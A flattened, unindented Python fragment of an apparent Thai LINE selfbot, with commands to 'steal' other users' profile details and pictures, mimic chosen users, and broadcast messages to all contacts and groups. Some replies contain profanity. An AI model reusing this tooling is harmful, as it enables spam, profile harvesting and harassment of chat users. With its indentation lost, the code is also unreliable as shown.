elif texttl == 'off':
if not settings['autoRead']:
line.sendMessage(to, 'ปิดอ่านออโต้')
else:
settings['autoRead'] = False
line.sendMessage(to, 'ปิดอ่านออโต้')
elif cmd.startswith('checkcontact '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkContact']:
line.sendMessage(to, 'เปิดเช็คคท')
else:
settings['checkContact'] = True
line.sendMessage(to, 'เปิดเช็คคท')
elif texttl == 'off':
if not settings['checkContact']:
line.sendMessage(to, 'ปิดเช็คคท')
else:
settings['checkContact'] = False
line.sendMessage(to, 'ปิดเช็คคท')
elif cmd.startswith('checkpost '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkPost']:
line.sendMessage(to, 'เปิดเช็คโพส')
else:
settings['checkPost'] = True
line.sendMessage(to, 'เปิดเช็คโพส')
elif texttl == 'off':
if not settings['checkPost']:
line.sendMessage(to, 'ปิดเช็คโพส')
else:
settings['checkPost'] = False
line.sendMessage(to, 'ปิดเช็คโพส')
elif cmd.startswith('checksticker '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if settings['checkSticker']:
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = True
line.sendMessage(to, 'เปิดเช็คสติ๊กเกอร์')
elif texttl == 'off':
if not settings['checkSticker']:
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
else:
settings['checkSticker'] = False
line.sendMessage(to, 'ปิดเช็คสติ๊กเกอร์')
elif cmd.startswith('จัดไป1'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getProfile()
res = '╭━━━🌷ข้อมูล ส่วนตัว วิไล🌷'
res += '\n║👊 ไอดี : ' + profile.mid
res += '\n║👊 Display ชื่อ : ' + str(profile.displayName)
res += '\n║👊 Usage : '
res += '\n║👼 {key}จัดไป1'
res += '\n║👼 {key}จัดไป ไอดี'
res += '\n║👼 {key}จัดไป ชื่อ'
res += '\n║👼 {key}จัดไป ตัส'
res += '\n║👼 {key}จัดไป รูป'
res += '\n║👼 {key}จัดไป ปก'
res += '\n║👼 {key)จัดไป ตั้ง ชื่อ ❨พิมพ์❩'
res += '\n║👼 {key}จัดไป ตั้ง ตัส ❨พิมพ์❩'
res += '\n║👼 {key}จัดไป ตั้ง รูป ❨ส่งภาพ❩'
res += '\n║👼 {key}จัดไป ตั้ง ปก ❨ส่งภาพ❩'
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if texttl == 'ไอดี':
line.sendMessage(to, '💟 นี้แหละไอดีผู้สร้าง 💟\n' + str(profile.mid))
elif texttl == 'ชื่อ':
line.sendMessage(to, '💟 นี้แหละชื่อผู้สร้าง 💟\n' + str(profile.displayName))
elif texttl == 'ตัส':
line.sendMessage(to, '💟 นี้แหละตัสผู้สร้าง 💟\n' + str(profile.statusMessage))
elif texttl == 'รูป':
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '💟 Picture Status 💟\n' + path)
else:
line.sendMessage(to, 'ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ไม่ได้ใส่รูป')
elif texttl == 'ปก':
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '💟 Cover Picture 💟\n' + str(cover))
elif texttl.startswith('ตั้ง '):
texts = textt[7:]
textsl = texts.lower()
if textsl.startswith('ชื่อ '):
name = texts[5:]
if len(name) <= 20:
profile.displayName = name
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนชื่อสำเร็จ\nเปลี่ยนชื่อเป็น`%s`' % name)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนชื่อได้\nความยาวของชื่อต้องไม่เกิน 20')
elif textsl.startswith('ตัส '):
bio = texts[4:]
if len(bio) <= 3000:
profile.statusMessage = bio
line.updateProfile(profile)
line.sendMessage(to, 'เปลี่ยนสถานะเรียบร้อย\nเปลี่ยนสถนานะเป็น `%s`' % bio)
else:
line.sendMessage(to, 'ไม่สามารถเปลี่ยนสถานะได้\nความยาวของข้อความสถานะต้องไม่เกิน3000')
elif textsl == 'รูป':
settings['changePictureProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปโปรไฟล์, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
elif textsl == 'ปก':
settings['changeCoverProfile'] = True
line.sendMessage(to, 'กรุณาส่งภาพเพื่อเปลี่ยนรูปปก, พิม `{key}Abort` ถ้าต้องการยกเลิก\nคำเตือน:การดาวน์โหลดภาพจะล้มเหลวหากอัพโหลดภาพนานเกินไป'.format(key=setKey.title()))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('จัดไป'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
profile = line.getContact(to) if msg.toType == 0 else None
res = '╭━━━🌷 เอา ข้อมูล จัดไป 🌷'
if profile:
res += '\n║👊 ไอดี: ' + profile.mid
res += '\n║👊 ชื่อ : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n║👊 Status ข้อความ : ' + str(profile.statusMessage)
res += '\n║👊 Usage : '
res += '\n║👼 {key}จัดไป'
res += '\n║👼 {key}จัดไป ไอดี'
res += '\n║👼 {key}จัดไป ชื่อ'
res += '\n║👼 {key}จัดไป ตัส'
res += '\n║👼 {key}จัดไป รูป'
res += '\n║👼 {key}จัดไป ปก'
res += '\n║👼 {key}Profile Steal Profile <mention>'
res += '\n║👼 {key}Profile Steal Mid <mention>'
res += '\n║👼 {key}Profile Steal Name <mention>'
res += '\n║👼 {key}Profile Steal Bio <mention>'
res += '\n║👼 {key}Profile Steal Pict <mention>'
res += '\n║👼 {key}Profile Steal Cover <mention>'
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
if texttl == 'ไอดี':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละไอดีฉัน 💟\n' + str(profile.mid))
elif texttl == 'ชื่อ':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละชื่อฉัน 💟\n' + str(profile.displayName))
elif texttl == 'ตัส':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
line.sendMessage(to, '💟 นี้แหละสถานะของฉัน 💟\n' + str(profile.statusMessage))
elif texttl == 'รูป':
if msg.toType != 0: return line.sendMessage(to, '🙄...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น...ควย🙄')
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
line.sendMessage(to, '💟 Picture Status 💟\n' + path)
else:
line.sendMessage(to, '🙄ควย...ไม่สามารถแสดงรูปได้เนื่องจากผู้ใช้นี้ลบบัญชีไปแล้ว🙄')
elif texttl == 'ปก':
if msg.toType != 0: return line.sendMessage(to, '🙄สัส...คำสั่งนี้ใช้ได้ในแชทส่วนตัวเท่านั้น..ควย🙄')
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '💟 Cover Picture 💟\n' + str(cover))
elif texttl.startswith('steal '):
texts = textt[6:]
textsl = texts.lower()
if textsl.startswith('profile '):
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
profile = line.getContact(mention['M'])
if profile.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + profile.pictureStatus)
cover = line.getProfileCoverURL(profile.mid)
line.sendImageWithURL(to, str(cover))
res = '╭━━━🌷 เอา ข้อมูล จัดไป 🌷'
res += '\n║👊 ไอดี : ' + profile.mid
res += '\n║👊 ชื่อ : ' + str(profile.displayName)
if profile.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(profile.displayNameOverridden)
res += '\n║👊 Status ข้อความ : ' + str(profile.statusMessage)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, '🙄ควย..อะไรของมึง, แทคชื่อด้วยสิ🙄')
elif textsl.startswith('mid '):
res = '╭───「 Mid」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
return line.sendMessage(to, '「 MID 」\n' + mid)
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
res += '\n│ %i. %s' % (no, mid)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, '🙄สัส...มึงก็แทคชื่อด้วยสิควย🙄')
elif textsl.startswith('name '):
res = '╭───「 Display Name 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Display Name 」\n' + str(profile.displayName))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.displayName)
res += '\n╰━━━👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('bio '):
res = '╭───「 Status Message 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
return line.sendMessage(to, '「 Status Message 」\n' + str(profile.statusMessage))
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
res += '\n│ %i. %s' % (no, profile.statusMessage)
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงสถานะได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('pict '):
res = '╭───「 Picture Status 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
profile = line.getContact(mentions['MENTIONEES'][0]['M'])
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
return line.sendMessage(to, '「 Picture Status 」\n' + path)
else:
return line.sendMessage(to, 'ไม่สามารถดึงรูปได้, บุคคนนี้ `%s` doesn\'ไม่ได้ใส่รูปภาพโปรไฟล์' % profile.displayName)
for mention in mentions['MENTIONEES']:
mid = mention['M']
profile = line.getContact(mid)
no += 1
if profile.pictureStatus:
path = 'http://dl.profile.line-cdn.net/' + profile.pictureStatus
line.sendImageWithURL(to, path)
res += '\n│ %i. %s' % (no, path)
else:
res += '\n│ %i. Not Found' % no
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงรูปได้, กรุณาแทคผู้ใช้ด้วย')
elif textsl.startswith('cover '):
res = '╭───「 Cover Picture 」'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
if len(mentions['MENTIONEES']) == 1:
mid = mentions['MENTIONEES'][0]['M']
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
line.sendMessage(to, '「 Cover Picture 」\n' + str(cover))
for mention in mentions['MENTIONEES']:
mid = mention['M']
no += 1
cover = line.getProfileCoverURL(mid)
line.sendImageWithURL(to, str(cover))
res += '\n│ %i. %s' % (no, cover)
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, parsingRes(res))
else:
line.sendMessage(to, 'ไม่สามารถดึงปกได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('mimic'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
targets = ''
if settings['mimic']['target']:
no = 0
for target, status in settings['mimic']['target'].items():
no += 1
try:
name = line.getContact(target).displayName
except TalkException:
name = 'Unknown'
targets += '\n│ %i. %s//%s' % (no, name, bool_dict[status][1])
else:
targets += '\n│ Nothing'
res = '╭───「 Mimic 」'
res += '\n├🌷 Status : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├🌷 List :'
res += targets
res += '\n├👊 Usage : '
res += '\n│🌷 {key}Mimic'
res += '\n│🌷 {key}Mimic <on/off>'
res += '\n│🌷 {key}Mimic Reset'
res += '\n│🌷 {key}Mimic Add <mention>'
res += '\n│🌷 {key}Mimic Del <mention>'
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if cmd == 'mimic':
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl == 'on':
if settings['mimic']['status']:
line.sendMessage(to, 'เริ่มการล้อเลียน')
else:
settings['mimic']['status'] = True
line.sendMessage(to, 'เริ่มการล้อเลียน')
elif texttl == 'off':
if not settings['mimic']['status']:
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
else:
settings['mimic']['status'] = False
line.sendMessage(to, 'ยกเลิกการล้อเลียน')
elif texttl == 'reset':
settings['mimic']['target'] = {}
line.sendMessage(to, 'รีเช็ตรายชื่อที่จะล้อเลี่ยนเรียบร้อย')
elif texttl.startswith('add '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Add Target'
res += '\n├ Added :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
settings['mimic']['target'][mid] = True
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถเพื่มรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
res = '╭───「 Mimic 」'
res += '\n├ Status : Del Target'
res += '\n├ Deleted :'
no = 0
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in settings['mimic']['target']:
settings['mimic']['target'][mid] = False
no += 1
try:
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───「SelfBot ProtectV3.5」'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถลบรายชื่อได้, กรุณาแทคผู้ใช้ด้วย')
else:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('ประกาศ'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cond = textt.split(' ')
res = '╭───「 ประกาศ 」'
res += '\n├🌷 ประกาศ ข้อความ : '
res += '\n│🌷 1 : เพื่อน'
res += '\n│🌷 2 : กลุ่ม'
res += '\n│🌷 0 : All'
res += '\n├👊 Usage : '
res += '\n│👊 {key}ประกาศ'
res += '\n│👊 {key}ประกาศ ⁐【พิมพ์】'
res += '\n╰───【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
if cmd == 'ประกาศ':
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cond[0] == '1':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊 '
targets = line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i คน' % len(targets))
elif cond[0] == '2':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】'
targets = line.getGroupIdsJoined()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i กลุ่ม' % len(targets))
elif cond[0] == '0':
if len(cond) < 2:
return line.sendMessage(to, 'ไม่สามารถประกาศได้, ไม่พบข้อความ')
res = '「 ประกาศ 」\n'
res += textt[2:]
res += '\n\n👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
targets = line.getGroupIdsJoined() + line.getAllContactIds()
for target in targets:
try:
line.sendMessage(target, res)
except TalkException:
targets.remove(target)
continue
time.sleep(0.8)
line.sendMessage(to, 'ประกาศเรียบร้อย, จำนวน %i ' % len(targets))
else:
line.sendMessage(to, parsingRes(res).format(key=setKey.title()))
elif cmd.startswith('เพื่อน'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getAllContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 ข้อมูลเพื่อน」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}FriendList'
res += '\n│ • {key}FriendList Info <num/name>'
res += '\n│ • {key}FriendList Add <mention>'
res += '\n│ • {key}FriendList Del <mention/num/name/all>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊 '
ress.append(res)
if cmd == 'เพื่อน':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลเพื่อนล้มเหลว, ไม่พบเพื่อน')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Friend List 」'
res += '\n├ Status : Add Friend'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.findAndAddContactsByMid(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'ไม่สามารถแอดเพื่อนได้, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
return line.sendMessage(to, 'เปิดข้อผิดพลาดที่ไม่แน่ชัด')
res = '╭───「 Friend List 」'
res += '\n├ Status : Del Friend'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.deleteContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.deleteContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'Failed del friend with name `%s`, ไม่พบชื่อกลุ่มนี้ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif cmd.startswith('blocklist'):
textt = removeCmd(text, setKey)
texttl = textt.lower()
cids = line.getBlockedContactIds()
cids.sort()
cnames = []
ress = []
res = '╭───「 Block List 」'
res += '\n├ List:'
if cids:
contacts = []
no = 0
if len(cids) > 200:
parsed_len = len(cids)//200+1
for point in range(parsed_len):
for cid in cids[point*200:(point+1)*200]:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
if res:
if res.startswith('\n'): res = res[1:]
if point != parsed_len - 1:
ress.append(res)
if point != parsed_len - 1:
res = ''
else:
for cid in cids:
try:
contact = line.getContact(cid)
contacts.append(contact)
except TalkException:
cids.remove(cid)
continue
no += 1
res += '\n│ %i. %s' % (no, contact.displayName)
cnames.append(contact.displayName)
else:
res += '\n│ Nothing'
res += '\n├ Usage : '
res += '\n│ • {key}BlockList'
res += '\n│ • {key}BlockList Info <num/name>'
res += '\n│ • {key}BlockList Add <mention>'
res += '\n│ • {key}BlockList Del <mention/num/name/all>'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
ress.append(res)
if cmd == 'blocklist':
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif texttl.startswith('info '):
texts = textt[5:].split(', ')
if not cids:
return line.sendMessage(to, 'แสดงข้อมูลผู้ใช้ที่ถูกบล็อกล้มเหลว, ไม่มีผู้ใช้ในรายการ')
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.pictureStatus:
line.sendImageWithURL(to, 'http://dl.profile.line-cdn.net/' + contact.pictureStatus)
cover = line.getProfileCoverURL(contact.mid)
line.sendImageWithURL(to, str(cover))
res = '╭───「 Contact Info 」'
res += '\n├ MID : ' + contact.mid
res += '\n├ Display Name : ' + str(contact.displayName)
if contact.displayNameOverridden: res += '\n├ Display Name Overridden : ' + str(contact.displayNameOverridden)
res += '\n├ Status Message : ' + str(contact.statusMessage)
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, parsingRes(res))
elif texttl.startswith('add '):
res = '╭───「 Block List 」'
res += '\n├ Status : Add Block'
res += '\n├ Added :'
no = 0
added = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid in cids or mid in added:
continue
no += 1
try:
line.blockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
added.append(mid)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
line.sendMessage(to, 'Failed block contact, กรุณาแทคผู้ใช้ด้วย')
elif texttl.startswith('del '):
texts = textt[4:].split(', ')
if not cids:
return line.sendMessage(to, 'ไม่สามาถปลกบล็อคได้, ไม่มีผู้ใช้ในรายการ')
res = '╭───「 Block List 」'
res += '\n├ Status : Del Block'
res += '\n├ Deleted :'
no = 0
deleted = []
if 'MENTION' in msg.contentMetadata.keys():
mentions = ast.literal_eval(msg.contentMetadata['MENTION'])
for mention in mentions['MENTIONEES']:
mid = mention['M']
if mid not in cids or mid in deleted:
continue
no += 1
try:
line.unblockContact(mid)
name = line.getContact(mid).displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(mid)
for texxt in texts:
num = None
name = None
try:
num = int(texxt)
except ValueError:
name = texxt
if num != None:
contact = contacts[num - 1]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name != None:
if name in cnames:
contact = contacts[cnames.index(name)]
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
elif name.lower() == 'all':
for contact in contacts:
if contact.mid not in cids and contact.mid in deleted:
continue
no += 1
try:
line.unblockContact(contact.mid)
name = contact.displayName
except TalkException:
name = 'Unknown'
res += '\n│ %i. %s' % (no, name)
deleted.append(contact.mid)
time.sleep(0.8)
else:
line.sendMessage(to, 'ไม่สามารถปลดบล็อกรายชื่อนี้ได้ `%s`, ชื่อไม่อยู่ในรายการ ♪' % name)
if no == 0: res += '\n│ Nothing'
res += '\n╰───👊【☠⁐Tҽαɱ ƑմçҟᎠҽѵìӀ✍⁐☠】👊'
line.sendMessage(to, res)
else:
for res in ress:
line.sendMessage(to, parsingRes(res).format_map(SafeDict(key=setKey.title())))
elif msg.text.lower() == ".getjoined":
line.sendMessage(to,"กรุณารอสักครู่ ใจเย็นๆ")
all = line.getGroupIdsJoined()
text = ""
cnt = 0
for i in all:
text += line.getGroup(i).name + "\n" + i + "\n\n"
cnt += 1
if cnt == 10:
line.sendMessage(to,text[:-2])
text = ""
